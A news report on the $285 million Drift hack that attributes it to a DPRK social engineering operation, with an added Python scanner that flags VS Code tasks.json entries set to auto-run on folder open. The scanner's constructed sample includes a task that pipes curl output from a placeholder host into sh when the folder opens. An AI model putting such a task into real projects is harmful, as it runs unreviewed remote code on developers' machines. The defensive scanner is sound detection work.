$285 Million Drift Hack Traced to Six-Month DPRK Social Engineering Scheme
In a major cybersecurity incident, Drift has revealed that a breach occurring on April 1, 2026, led to the theft of $285 million. This attack was the result of a carefully orchestrated social engineering operation linked to the Democratic People’s Republic of Korea (DPRK). The operation, which began in the fall of 2025, underscores the evolving tactics of state-sponsored hacking groups.
Drift, a decentralized exchange operating on the Solana blockchain, described the incident as “an attack six months in the making.” The company has attributed the breach to a North Korean hacking group known as UNC4736, which operates under various aliases such as AppleJeus, Citrine Sleet, Golden Chollima, and Gleaming Pisces. This group has a documented history of targeting the cryptocurrency sector for financial gain, with activities traced back to at least 2018.
The Background of UNC4736
UNC4736 is notorious for its involvement in high-profile cyberattacks, including the X_TRADER/3CX supply chain breach in 2023 and the $53 million hack of the decentralized finance platform Radiant Capital in October 2024. Drift’s analysis indicates that the financial flows from the recent attack can be traced back to the same group responsible for the Radiant Capital incident, suggesting a continuity in operational tactics.
In a report published in late January 2026, cybersecurity firm CrowdStrike identified Golden Chollima as an offshoot of Labyrinth Chollima, primarily focused on cryptocurrency theft. This group has targeted smaller fintech firms across the U.S., Canada, South Korea, India, and Western Europe. CrowdStrike noted that such operations are crucial for generating revenue for the DPRK regime, especially as the country seeks to fund military ambitions, including the construction of new naval vessels and nuclear submarines.
The Mechanics of the Drift Attack
Drift is currently working with law enforcement and forensic experts to reconstruct the sequence of events leading to the breach. The company characterized the attack as a “structured intelligence operation” that required extensive planning.
Starting in the fall of 2025, individuals posing as representatives of a quantitative trading firm approached Drift contributors at various cryptocurrency conferences. These interactions were part of a deliberate strategy to build rapport with specific individuals over a six-month period. Drift clarified that the individuals who engaged with their contributors were not North Korean nationals but intermediaries employed by DPRK operatives.
These intermediaries were technically proficient and presented verifiable professional backgrounds. A Telegram group was established following initial meetings, leading to months of discussions surrounding trading strategies and potential integrations with Drift’s ecosystem.
Between December 2025 and January 2026, the group successfully onboarded an Ecosystem Vault on Drift, depositing over $1 million of their own funds. This move was strategically designed to create a legitimate operational presence within Drift’s ecosystem, facilitating ongoing conversations about integration. Drift also suspects that these interactions served as an initial infection vector; the Telegram chats and any malicious software used were deleted around the time of the attack.
Attack Vectors and Techniques
The investigation has identified two primary attack vectors. One contributor may have been compromised after cloning a code repository shared by the group, while another was persuaded to download a wallet product via Apple’s TestFlight for beta testing.
The repository-based intrusion likely involved a malicious Microsoft Visual Studio Code (VS Code) project that exploited the “tasks.json” file to execute malicious code automatically when the project was opened in the IDE. This technique has been associated with North Korean threat actors since December 2025, prompting Microsoft to implement new security controls in subsequent VS Code updates.
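As a defensive check for the repository vector described above, the following added example (not Drift’s, Microsoft’s or the reporting outlet’s code) parses a cloned checkout’s `.vscode/tasks.json` files, which VS Code reads as JSONC, and reports any task whose `runOptions.runOn` is `folderOpen`, the setting that lets a task launch when the folder is opened in the IDE. The embedded tasks.json sample is constructed, and `example.invalid` is a placeholder host.

```python
"""Flag VS Code tasks that auto-run on folder open (added example, not Drift's code)."""
import json
import re
from pathlib import Path

# Constructed sample tasks.json; the second task would fire when the folder is opened.
SAMPLE_TASKS_JSON = r'''{
  // comments are legal in VS Code's JSONC
  "version": "2.0.0",
  "tasks": [
    {"label": "lint", "type": "shell", "command": "npm run lint"},
    {"label": "setup", "type": "shell",
     "command": "curl -s https://example.invalid/setup.sh | sh",
     "runOptions": {"runOn": "folderOpen"},},
  ]
}'''

def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments outside strings, then trailing commas (JSONC -> JSON)."""
    out, i, n = [], 0, len(text)
    while i < n:
        if text[i] == '"':  # copy string literals verbatim so "https://..." survives
            j = i + 1
            while j < n and text[j] != '"':
                j += 2 if text[j] == '\\' else 1
            out.append(text[i:j + 1])
            i = j + 1
        elif text.startswith('//', i):
            nl = text.find('\n', i)
            i = n if nl == -1 else nl
        elif text.startswith('/*', i):
            end = text.find('*/', i + 2)
            i = n if end == -1 else end + 2
        else:
            out.append(text[i])
            i += 1
    return re.sub(r',(\s*[}\]])', r'\1', ''.join(out))

def auto_run_tasks(tasks_doc: dict) -> list[dict]:
    """Return tasks whose runOptions.runOn is "folderOpen", i.e. set to start when the folder opens."""
    return [{'label': t.get('label', '<unnamed>'), 'type': t.get('type'), 'command': t.get('command')}
            for t in tasks_doc.get('tasks', [])
            if (t.get('runOptions') or {}).get('runOn') == 'folderOpen']

def scan_repo(repo: Path) -> list[dict]:
    """Report folderOpen tasks from every .vscode/tasks.json below a cloned checkout."""
    return [{**hit, 'file': str(p.relative_to(repo))}
            for p in repo.rglob('.vscode/tasks.json')
            for hit in auto_run_tasks(json.loads(strip_jsonc(p.read_text(encoding='utf-8'))))]
```

Running `scan_repo` on a fresh clone before opening it in the IDE surfaces such tasks for review; a hit is a reason to inspect the command, not proof of compromise, since legitimate projects also use `folderOpen` for build watchers.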
Drift’s investigation revealed that the profiles used in this operation were meticulously crafted, complete with employment histories and professional networks. The individuals encountered by Drift contributors had spent considerable time building these profiles to withstand scrutiny during business interactions.
The Fragmented Malware Ecosystem of North Korea
Recent disclosures from DomainTools Investigations indicate that the DPRK’s cyber apparatus has evolved into a “deliberately fragmented” malware ecosystem. This shift is believed to be a response to intensified law enforcement actions and intelligence disclosures regarding North Korean hacking campaigns.
The compartmentalization of malware development and operations ensures that exposure in one area does not compromise the entire program. This model complicates attribution efforts and slows down defenders’ decision-making processes.
DomainTools noted that the DPRK’s espionage-oriented malware is primarily associated with Kimsuky, while the Lazarus Group focuses on generating illicit revenue for the regime. A third track involves deploying ransomware and wiper malware for strategic signaling.
Social Engineering Tactics and Broader Implications
Social engineering remains a critical factor in many intrusions attributed to DPRK threat actors. This includes the recent compromise of the popular npm package Axios and ongoing campaigns like Contagious Interview and IT worker fraud.
The Contagious Interview campaign involves adversaries tricking targets into executing malicious code from fake repositories. Meanwhile, DPRK IT worker fraud refers to coordinated efforts to secure remote freelance and full-time roles at Western companies using stolen identities and falsified credentials.
These state-sponsored programs deploy thousands of skilled workers in countries like China and Russia, who connect to company-issued laptops hosted in the U.S. and elsewhere. The scheme relies on a network of facilitators to manage logistics and payroll, further complicating attribution efforts.
As highlighted by Chainalysis, cryptocurrency plays a central role in funneling wages generated by these IT worker schemes back to North Korea, allowing the regime to evade international sanctions. The DPRK’s approach to cyber operations is not merely about financial gain; it reflects a broader strategy to infiltrate critical sectors, including defense contractors and financial institutions. The recruitment of skilled developers from various countries into this infrastructure underscores the regime’s commitment to enhancing its cyber capabilities.
For further details on the Drift hack and its implications, refer to the original reporting source: cyberwarriorsmiddleeast.com.
Published on 2026-04-05 22:25:00 • By the Editorial Desk